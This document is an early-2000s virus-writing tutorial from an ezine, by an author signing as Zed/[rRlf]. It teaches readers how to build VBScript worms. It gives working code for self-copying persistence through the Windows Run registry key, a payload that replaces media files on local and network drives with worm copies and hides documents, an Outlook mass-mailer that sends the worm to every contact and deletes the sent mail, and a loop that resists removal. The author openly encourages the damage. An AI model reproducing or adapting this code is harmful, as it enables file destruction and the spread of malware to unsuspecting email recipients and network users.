The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Zed/[rRlf]'s VBScript Tutorial #1 by Zed
------------
Introduction
------------
Ok, Welcome all those people who want to learn the dark side of the
Visual Basic Script programming language... First of all,
this tutorial that I have written is for people who are familiar with
VBScript, If you have no idea what you are doing, try learning a bit
of scripting first... before you break all of your files testing these
scripts! :)
-------------------
Beginning your code
-------------------
The first line of nearly all VBScript files is 'On Error Resume Next',
which is the basic error handler...
Then, you will also need to get your worm 'ready', for example,
you will need to define the FileSystemObject, and WScript.Shell,
System folders, etc..
Here is a basic example:
' --------------------------------------------------------------
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsc = CreateObject("WScript.Shell")
Set WinDir = fso.GetSpecialFolder(0)
Set SysDir = fso.GetSpecialFolder(1)
Set TempDir = fso.GetSpecialFolder(2)
Set G = fso.GetFile(WScript.ScriptFullName)
G.Copy (WinDir & "\WormCopy1.vbs")
G.Copy (SysDir & "\WormCopy2.vbs")
G.Copy (TempDir & "\WormCopy3.vbs")
G.Copy (WinDir & "\Passwords.vbs")
wsc.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stuff32", "Wscript.exe " & WinDir & "\WormCopy1.vbs" & " %1"
' --------------------------------------------------------------
This is a basic worm/virus method that copies itself, and then
writes itself under the Run key in the registry so that it can run
all the time when windows is accessed.
------------------------
Payloads/File Overriding
------------------------
This is the fun part... a payload that overrides files! hehe...
a good choice of file extensions to override would have to be
*.mp3, *.mpg, *.avi and *.mov. This is so because people who have P2P
sharing can be at risk for downloading worm overritten
music/video files :)
here is a basic overriding code:
' --------------------------------------------------------------
E1()
Sub E1()
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
For Each SeekNetCopyDrives In a.Drives ' -----> Expand our file attack onto mapped network drives, hehe!
If SeekNetCopyDrives.DriveType = 2 _
Or SeekNetCopyDrives.DriveType = 3 Then
E3 (SeekNetCopyDrives.Path & "\")
EndIf
Next
End Sub
Sub E2(FileTarget)
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.Files
Ext = LCase(a.GetExtensionName(n.Path))
If Ext = "mp3" Or Ext = "mpg" Or Ext = "mpe" _ ' -----> The files that the worm is attacking!
Or Ext = "mpeg" Or Ext = "mov" Then
a.CopyFile WScript.ScriptFullName, n.Path & ".vbs" ' -----> Create a copy of the file... for example, the target file could be 'Music.mp3', the worm would then create a file called 'Music.mp3.vbs' and delete 'Music.mp3'.
a.DeleteFile (n.Path) ' -----> Delete the original file.
End If
If Ext = "doc" Then ' -----> Just something extra to do... The worm will now look for *.doc, and hide them all. :)
Set GetDocFile = a.GetFile(n.Path)
GetDocFile.Attributes = 2 ' -----> Hide the Documents :)
End If
Next
End Sub
Sub E3(FileTarget)
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.SubFolders
E2 (n.Path)
E3 (n.Path)
Next
End Sub
' --------------------------------------------------------------
That code above is a simple and vey efficient payload for
damaging files, you are also probably wandering about the worm hiding
all document (*.doc) files... I just did this for an example of how to
set a file attribute upon a file, for example, making a file hidden,
read-only, etc..
Here are the attribute values that you can set upon files:
------------------------------------------------------------------------------------------------------
Constant Value Description
-------- ----- -----------
Normal 0 Normal file. No attributes are set.
ReadOnly 1 Read-only file. Attribute is read/write.
Hidden 2 Hidden file. Attribute is read/write.
System 4 System file. Attribute is read/write.
Volume 8 Disk drive volume label. Attribute is read-only.
Directory 16 Folder or directory. Attribute is read-only.
Archive 32 File has changed since last backup. Attribute is read/write.
Alias 64 Link or shortcut. Attribute is read-only.
Compressed 128 Compressed file. Attribute is read-only.
------------------------------------------------------------------------------------------------------
------------------
Outlook MassMailer
------------------
Have you ever found this notorious litte snippet of code interesting?
This code fascinated me when I first heard about outlook Mass-Emailing
Worms... If you don't have a clue what im going on about... this is
an extremely malicious code that emails a copy of the worm to everyone
located inside the Outlook address book.
This is most primary way of spreading your worm... all you have to do
is have a catchy name for the attachment - like 'Passwords.TXT.vbs'.
Ok... Enough talking - This is the Mass-Email code that I always use
in my Outlook VB Worms:
' --------------------------------------------------------------
Set OutlookApp = CreateObject("Outlook.Application")' -----> The Outlook Object :)
Set GNS = OutlookApp.GetNameSpace("MAPI")
For List1 = 1 To GNS.AddressLists.Count ' -----> Read the address lists.
CountLoop = 1
For ListCount = 1 To GNS.AddressLists(List1).AddressEntries.Count ' -----> Initiate a loop to get all of the contacts in the address book.
Set OutlookEmail = OutlookApp.CreateItem(0) ' -----> Create an email :)
OutlookEmail.Recipients.Add (GNS.AddressLists(List1).AddressEntries(CountLoop)) ' -----> Add the captured recipient name.
OutlookEmail.Subject = "Check this out!" ' -----> The email subject.
OutlookEmail.Body = "Look at the attachments... all of my passwords are in there :)" ' -----> The email Body (Text).
OutlookEmail.Attachments.Add (WinDir & "\WormCopy1.vbs") ' -----> Add the worm to the attachments.
OutlookEmail.DeleteAfterSubmit = True ' -----> This is a stealthy way of hiding the worms traces by deleting the emails after they are sent, so that they don't exist in the 'deleted items' folder.
OutlookEmail.Send ' -----> Send the email.
CountLoop = CountLoop + 1 ' -----> switch to the next contact (in other words - continue the loop)
Next ' ----->
Next ' -----> End the loops.
' --------------------------------------------------------------
Oh yeah, make sure that you don't use my Outlook Subject and Text,
Because that was just a lame example :)
And also, just in case you didn't know this, you can add a new line to
your text in anything, for example:
' --------------------------------------------------------------
MsgBox "Check this out." ' Would return: Check this out.
MsgBox "Check " & vbCrLf & "this out." ' Would return: Check
' this out.
MsgBox "Check " & vbCrLf _ ' Would return: Check
& "This out." ' this out.
' --------------------------------------------------------------
So the vbCrLf property basically means to add a new line (Note that
you can use this in the outlook text to type a decent outlook email).
You may also ask on how to Mass-Mail contacts once (obviously to
hide the suspicions of the virus, eg, if 10 emails of the same thing
was sent, you wouldn't have to be a genius to know that something
fishy is going on! :)
Here is the modification that you will have to make to the email code
so that it only emails each contact only once:
' --------------------------------------------------------------
Set OutlookApp = CreateObject("Outlook.Application")
Set GNS = OutlookApp.GetNameSpace("MAPI")
For List1 = 1 To GNS.AddressLists.Count
CountLoop = 1
For ListCount = 1 To GNS.AddressLists(List1).AddressEntries.Count
Set OutlookEmail = OutlookApp.CreateItem(0)
SentEmails = wsc.RegRead("HKEY_CURRENT_USER\Software\VBSWorm\ContactsEmailed\" & GNS.AddressLists(List1).AddressEntries(CountLoop))
If SentEmails = "" Then
OutlookEmail.Recipients.Add (GNS.AddressLists(List1).AddressEntries(CountLoop))
OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the attachments... all of my passwords are in there :)"
OutlookEmail.Attachments.Add (WinDir & "\Passwords.vbs")
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
wsc.RegWrite "HKEY_CURRENT_USER\Software\VBSWorm\ContactsEmailed\" & GNS.AddressLists(List1).AddressEntries(CountLoop), "VBSWorm Sent."
End If
CountLoop = CountLoop + 1
Next
Next
' --------------------------------------------------------------
And also, the code that can be really annoying - the registry and file
hook, this means that the worm attampts to 'hook' itself to the
computer, which will make it slightly harder to remove.
A basic registry and file hook would look like this:
' --------------------------------------------------------------
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsc = CreateObject("WScript.Shell")
Do ' -----> Start a loop
RegistryKey = wsc.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stuff32")
If Not RegistryKey = "" Then ' -----> If the worm doesn't exist in the registry then...
wsc.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stuff32", WinDir & "\WormCopy1.vbs" ' -----> Write another key :)
End If
If Not fso.FileExists(fso.GetSpecialFolder(0) & "\WormCopy1.vbs") Then ' -----> If the worm file itself doesn't exist then...
fso.CopyFile WScript.ScriptFullName, fso.GetSpecialFolder(0) & "\WormCopy1.vbs" ' -----> Make another copy :)
End If
Loop ' -----> Keep the file and registry hook running :)
' --------------------------------------------------------------
Well thats about all I can type for now, I will include some new
methods on VBScript in the next tutorial that I will be writing
shortly.
Good luck! :)
====================================
======Zed/[rRlf]======11/26/02======
====================================